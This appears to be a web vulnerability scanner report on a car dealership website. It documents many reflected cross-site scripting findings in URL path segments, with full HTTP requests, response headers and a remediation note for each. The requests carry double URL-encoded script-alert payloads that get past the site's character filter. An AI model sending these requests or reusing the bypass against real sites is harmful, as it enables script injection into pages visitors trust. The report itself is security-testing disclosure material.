GET /ScriptResource.axd87cba%253cscript%253ealert%25281%2529%253c%252fscript%253ebd3336606aa HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:51:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload da593%253cscript%253ealert%25281%2529%253c%252fscript%253e1fba3c56ae9 was submitted in the REST URL parameter 5. This input was echoed as da593<script>alert(1)</script>1fba3c56ae9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/128iConvertible/specialoffers.aspxda593%253cscript%253ealert%25281%2529%253c%252fscript%253e1fba3c56ae9 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e462a%253cscript%253ealert%25281%2529%253c%252fscript%253ebf930a6cdac was submitted in the REST URL parameter 5. This input was echoed as e462a<script>alert(1)</script>bf930a6cdac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/128icoupe/specialoffers.aspxe462a%253cscript%253ealert%25281%2529%253c%252fscript%253ebf930a6cdac HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:51:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ed193%253cscript%253ealert%25281%2529%253c%252fscript%253e0ead9635da8 was submitted in the REST URL parameter 5. This input was echoed as ed193<script>alert(1)</script>0ead9635da8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/135iConvertible/specialoffers.aspxed193%253cscript%253ealert%25281%2529%253c%252fscript%253e0ead9635da8 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22d00%253cscript%253ealert%25281%2529%253c%252fscript%253e0a8b2049276 was submitted in the REST URL parameter 5. This input was echoed as 22d00<script>alert(1)</script>0a8b2049276 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/135iCoupe/specialoffers.aspx22d00%253cscript%253ealert%25281%2529%253c%252fscript%253e0a8b2049276 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a2e8%253cscript%253ealert%25281%2529%253c%252fscript%253eb356b911f22 was submitted in the REST URL parameter 5. This input was echoed as 5a2e8<script>alert(1)</script>b356b911f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328iconvertible/specialoffers.aspx5a2e8%253cscript%253ealert%25281%2529%253c%252fscript%253eb356b911f22 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 46ce4%253cscript%253ealert%25281%2529%253c%252fscript%253efcf6a985cb4 was submitted in the REST URL parameter 5. This input was echoed as 46ce4<script>alert(1)</script>fcf6a985cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328icoupe/specialoffers.aspx46ce4%253cscript%253ealert%25281%2529%253c%252fscript%253efcf6a985cb4 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ed5b%253cscript%253ealert%25281%2529%253c%252fscript%253e1814399e1e2 was submitted in the REST URL parameter 5. This input was echoed as 5ed5b<script>alert(1)</script>1814399e1e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328isedan/specialoffers.aspx5ed5b%253cscript%253ealert%25281%2529%253c%252fscript%253e1814399e1e2 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 87601%253cscript%253ealert%25281%2529%253c%252fscript%253e7e6c06c1b24 was submitted in the REST URL parameter 5. This input was echoed as 87601<script>alert(1)</script>7e6c06c1b24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328ixdrivecoupe/specialoffers.aspx87601%253cscript%253ealert%25281%2529%253c%252fscript%253e7e6c06c1b24 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80d76%253cscript%253ealert%25281%2529%253c%252fscript%253ec777183dba0 was submitted in the REST URL parameter 5. This input was echoed as 80d76<script>alert(1)</script>c777183dba0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328ixdrivesedan/specialoffers.aspx80d76%253cscript%253ealert%25281%2529%253c%252fscript%253ec777183dba0 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b06fb%253cscript%253ealert%25281%2529%253c%252fscript%253e5daad8dc562 was submitted in the REST URL parameter 5. This input was echoed as b06fb<script>alert(1)</script>5daad8dc562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335dsedan/specialoffers.aspxb06fb%253cscript%253ealert%25281%2529%253c%252fscript%253e5daad8dc562 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1caa%253cscript%253ealert%25281%2529%253c%252fscript%253e5a74548ffe was submitted in the REST URL parameter 5. This input was echoed as c1caa<script>alert(1)</script>5a74548ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335icoupe/specialoffers.aspxc1caa%253cscript%253ealert%25281%2529%253c%252fscript%253e5a74548ffe HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78427%253cscript%253ealert%25281%2529%253c%252fscript%253e05718ba38a2 was submitted in the REST URL parameter 5. This input was echoed as 78427<script>alert(1)</script>05718ba38a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335iscoupe/specialoffers.aspx78427%253cscript%253ealert%25281%2529%253c%252fscript%253e05718ba38a2 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 99909%253cscript%253ealert%25281%2529%253c%252fscript%253eb322278433c was submitted in the REST URL parameter 5. This input was echoed as 99909<script>alert(1)</script>b322278433c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335isedan/specialoffers.aspx99909%253cscript%253ealert%25281%2529%253c%252fscript%253eb322278433c HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fe9b5%253cscript%253ealert%25281%2529%253c%252fscript%253e05acb610f68 was submitted in the REST URL parameter 5. This input was echoed as fe9b5<script>alert(1)</script>05acb610f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335ixdrivecoupe/specialoffers.aspxfe9b5%253cscript%253ealert%25281%2529%253c%252fscript%253e05acb610f68 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 512d2%253cscript%253ealert%25281%2529%253c%252fscript%253e59309063493 was submitted in the REST URL parameter 5. This input was echoed as 512d2<script>alert(1)</script>59309063493 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335ixdrivesedan/specialoffers.aspx512d2%253cscript%253ealert%25281%2529%253c%252fscript%253e59309063493 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:53:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d43af%253cscript%253ealert%25281%2529%253c%252fscript%253e19fd595356 was submitted in the REST URL parameter 1. This input was echoed as d43af<script>alert(1)</script>19fd595356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /WebResource.axdd43af%253cscript%253ealert%25281%2529%253c%252fscript%253e19fd595356 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:51:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
